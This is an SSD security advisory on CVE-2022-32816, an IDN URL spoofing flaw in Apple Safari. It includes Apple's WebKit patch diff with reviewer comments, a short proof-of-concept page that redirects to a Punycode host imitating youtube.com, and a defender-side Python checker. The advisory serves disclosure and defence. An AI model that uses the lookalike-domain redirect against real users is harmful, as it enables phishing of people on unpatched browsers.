SSD Advisory – Apple Safari IDN URL Spoofing

TL;DR

Improper IDN handling in Apple Safari allows attackers to use certain look-alike characters in place of the real ones, confusing victims into thinking they are reaching a certain site while they are actually accessing another one.

Vulnerability Summary

A vulnerability in Apple Safari's IDN handling allows attackers to perform URL spoofing, because Safari does not convert inappropriate Unicode in the URL bar to Punycode.

An attacker could exploit this vulnerability for phishing.

Credit

The security researcher, Dohyun Lee from SSD Labs (Korea), has reported this to the SSD Secure Disclosure program.

Affected Versions

  • iOS and iPadOS versions before 15.6
  • macOS Monterey versions before 12.5
  • watchOS versions before 8.7
  • tvOS versions before 15.6

CVE

CVE-2022-32816

Vendor Response

iOS 15.6 and iPadOS 15.6 address this issue. Information about the security content is available at: https://support.apple.com/HT213346.

Vulnerability Analysis

Apple Safari does not convert the Canadian Syllabics character U+15AF (0x15AF) to Punycode in the URL bar. The character looks similar to the lowercase English letter b, which allows attackers to perform IDN URL spoofing.

There is no single root cause (code line) for this vulnerability. As a solution, Apple applied a patch that converts this Unicode character to Punycode when it is entered into the URL bar.

Here is Apple’s patch for this vulnerability:

Subversion Revision: 292721
diff --git a/Source/WTF/ChangeLog b/Source/WTF/ChangeLog
index 6ed39d8235a1d336dbfa47cb8a2af2b2402345aa..3fb74a59b1c0d4ad5d32d27898f4b5578e10c2ad 100644
--- a/Source/WTF/ChangeLog
+++ b/Source/WTF/ChangeLog
@@ -1,3 +1,15 @@
+2022-04-13  Alex Christensen  <achristensen@webkit.org>
+
+        Punycode encode U+15AF when not in context of other Canadian aboriginal code points
+        https://bugs.webkit.org/show_bug.cgi?id=239316
+        <rdar://91248059>
+
+        Reviewed by NOBODY (OOPS!).
+
+        * wtf/URLHelpers.cpp:
+        (WTF::URLHelpers::isLookalikeCharacterOfScriptType<USCRIPT_CANADIAN_ABORIGINAL>):
+        (WTF::URLHelpers::isLookalikeCharacter):
+
 2022-04-11  Yusuke Suzuki  <ysuzuki@apple.com>

         [JSC] Reduce use of unnecessary cryptographicallyRandom numbers
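
Review bot: The new Source/WTF/ChangeLog entry still carries the placeholder line "Reviewed by NOBODY (OOPS!)." and consists of the title and bug link only. Fill in the reviewer before landing, and add a sentence under the bug link saying which character U+15AF is mistaken for, so the entry can be understood without opening the bug.
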
diff --git a/Source/WTF/wtf/URLHelpers.cpp b/Source/WTF/wtf/URLHelpers.cpp
index 17865fa784a885411967943cb93b1d7b0153410b..de58cd28c4627c9267c9da9a4b0b2483da5d0f7f 100644
--- a/Source/WTF/wtf/URLHelpers.cpp
+++ b/Source/WTF/wtf/URLHelpers.cpp
@@ -92,6 +92,16 @@ template<> bool isLookalikeCharacterOfScriptType<USCRIPT_TAMIL>(UChar32 codePoin
     }
 }

+template<> bool isLookalikeCharacterOfScriptType<USCRIPT_CANADIAN_ABORIGINAL>(UChar32 codePoint)
+{
+    switch (codePoint) {
+    case 0x15AF: /* CANADIAN SYLLABICS AIVILIK B */
+        return true;
+    default:
+        return false;
+    }
+}
+
 template <UScriptCode ScriptType>
 bool isOfScriptType(UChar32 codePoint)
 {
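
Review bot: In the new isLookalikeCharacterOfScriptType<USCRIPT_CANADIAN_ABORIGINAL> specialization, the comment on case 0x15AF gives the Unicode name but not the character it is confused with, so the reason for listing exactly this one code point is not visible at the definition. Extend the comment to name the Latin lookalike and reference the bug, so a later reader can judge whether further code points from the same script belong in the switch.
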
@@ -287,7 +297,8 @@ static bool isLookalikeCharacter(const std::optional<UChar32>& previousCodePoint
         return false;
     default:
         return isLookalikeSequence<USCRIPT_ARMENIAN>(previousCodePoint, codePoint)
-            || isLookalikeSequence<USCRIPT_TAMIL>(previousCodePoint, codePoint);
+            || isLookalikeSequence<USCRIPT_TAMIL>(previousCodePoint, codePoint)
+            || isLookalikeSequence<USCRIPT_CANADIAN_ABORIGINAL>(previousCodePoint, codePoint);
     }
 }

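Review bot: The added isLookalikeSequence<USCRIPT_CANADIAN_ABORIGINAL> term in the default branch decides on previousCodePoint and codePoint alone, and nothing at the call site says what context makes U+15AF acceptable. A short comment above the return, matching the ChangeLog wording ("when not in context of other Canadian aboriginal code points"), would document the intended rule for all three scripts in the chain.
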
diff --git a/Tools/ChangeLog b/Tools/ChangeLog
index 6c1a303a45f4abfb2e695a138bc77ce8693eae3e..d3c4fbea7858130304db780ad2a952fdc1c036d5 100644
--- a/Tools/ChangeLog
+++ b/Tools/ChangeLog
@@ -1,3 +1,14 @@
+2022-04-13  Alex Christensen  <achristensen@webkit.org>
+
+        Punycode encode U+15AF when not in context of other Canadian aboriginal code points
+        https://bugs.webkit.org/show_bug.cgi?id=239316
+        <rdar://91248059>
+
+        Reviewed by NOBODY (OOPS!).
+
+        * TestWebKitAPI/Tests/WTF/cocoa/URLExtras.mm:
+        (TestWebKitAPI::TEST):
+
 2022-04-11  Sihui Liu  <sihui_liu@apple.com>

         Fix size computation in WebCore::StorageMap
diff --git a/Tools/TestWebKitAPI/Tests/WTF/cocoa/URLExtras.mm b/Tools/TestWebKitAPI/Tests/WTF/cocoa/URLExtras.mm
index 00fb2dc4b78eed7c9fd1da83e67da2b1edea17df..5ac5668db5a186573b4ec23dbd943121d4a1f844 100644
--- a/Tools/TestWebKitAPI/Tests/WTF/cocoa/URLExtras.mm
+++ b/Tools/TestWebKitAPI/Tests/WTF/cocoa/URLExtras.mm
@@ -126,6 +126,8 @@ TEST(WTF_URLExtras, URLExtras_Spoof)
         "xn--g-idc"_s, // 'g' U+0581
         "xn--o-00e"_s, // U+0BE6 'o'
         "xn--o-10e"_s, // 'o' U+0BE6
+        "xn--a-53i"_s, // U+15AF 'a'
+        "xn--a-63i"_s, // 'a' U+15AF
     };
     for (auto& host : punycodedSpoofHosts) {
         auto url = makeString("http://", host, "/").utf8();
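
Review bot: The two entries added to punycodedSpoofHosts, "xn--a-53i" and "xn--a-63i", only cover U+15AF at the start or end of a two-character label. Add a host where U+15AF sits between ASCII letters in a longer label, so the pairwise check is exercised with a non-matching neighbour on both sides of the character.
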
@@ -152,6 +154,9 @@ TEST(WTF_URLExtras, URLExtras_NotSpoofed)

     // Tamil
     EXPECT_STREQ("https://\u0BE6\u0BE7\u0BE8\u0BE9count/", userVisibleString(literalURL("https://\u0BE6\u0BE7\u0BE8\u0BE9count/")));
+
+    // Canadian aboriginal
+    EXPECT_STREQ("https://\u15AF\u1401abc/", userVisibleString(literalURL("https://\u15AF\u1401abc/")));
 }

 TEST(WTF_URLExtras, URLExtras_DivisionSign)
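
Review bot: The Canadian aboriginal case added to URLExtras_NotSpoofed checks only U+15AF followed by U+1401; the reverse order, with U+15AF preceded by another syllabics code point, is not tested. Add a second EXPECT_STREQ with the order swapped, and say in the comment that the label is expected to stay in Unicode because U+15AF has a same-script neighbour.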

Proof of Concept

<html>
<head>
  <title>Apple Safari IDN URL Spoofing Proof of Concept - SSD Labs</title>
</head>
<body>
  <button onclick="trigger()">Trigger!</button>

  <script>
    function trigger() {
      window.location = "http://xn--youtue-084a.com/";
    }
  </script>
</body>
</html>
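
The host in the PoC above decodes to a label in which U+15AF stands where a Latin b would be. The following added example (not part of the advisory or of WebKit) decodes Punycode labels and flags U+15AF when a neighbouring character is outside Canadian Syllabics, which is a simplified reading of the patch's ChangeLog title. The function names and the block-range script test are assumptions of this example.

```python
# Added example: defender-side check for hostnames taken from logs or mail.
# Simplified rule modelled on the ChangeLog title; this is not WebKit's code.

LOOKALIKES = {0x15AF: "b"}  # CANADIAN SYLLABICS AIVILIK B, resembles Latin 'b'

# Assumption: script membership is approximated by Unicode block ranges
# (Unified Canadian Aboriginal Syllabics and its Extended block).
SYLLABICS_BLOCKS = ((0x1400, 0x167F), (0x18B0, 0x18FF))


def is_syllabics(ch):
    return any(lo <= ord(ch) <= hi for lo, hi in SYLLABICS_BLOCKS)


def decode_label(label):
    """Return the Unicode form of one DNS label (decodes an xn-- label)."""
    if label.lower().startswith("xn--"):
        try:
            return label[4:].encode("ascii").decode("punycode")
        except (UnicodeError, ValueError):
            return label  # malformed Punycode: keep the raw label
    return label


def suspicious_labels(hostname):
    """Return (decoded_label, ascii_skeleton) for each label in which a
    lookalike has a neighbour from outside Canadian Syllabics."""
    hits = []
    for raw in hostname.rstrip(".").split("."):
        label = decode_label(raw)
        for i, ch in enumerate(label):
            if ord(ch) not in LOOKALIKES:
                continue
            neighbours = label[max(i - 1, 0):i] + label[i + 1:i + 2]
            if any(not is_syllabics(n) for n in neighbours):
                skeleton = "".join(LOOKALIKES.get(ord(c), c) for c in label)
                hits.append((label, skeleton))
                break
    return hits


if __name__ == "__main__":
    # Hosts taken from the PoC and from the patch's test file on this page.
    for host in ("xn--youtue-084a.com", "xn--a-53i", "\u15af\u1401abc"):
        print(host, suspicious_labels(host))
```

The skeleton in each hit is the label with the lookalike replaced by the Latin letter it imitates, which is the string to compare against a list of protected brand names.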
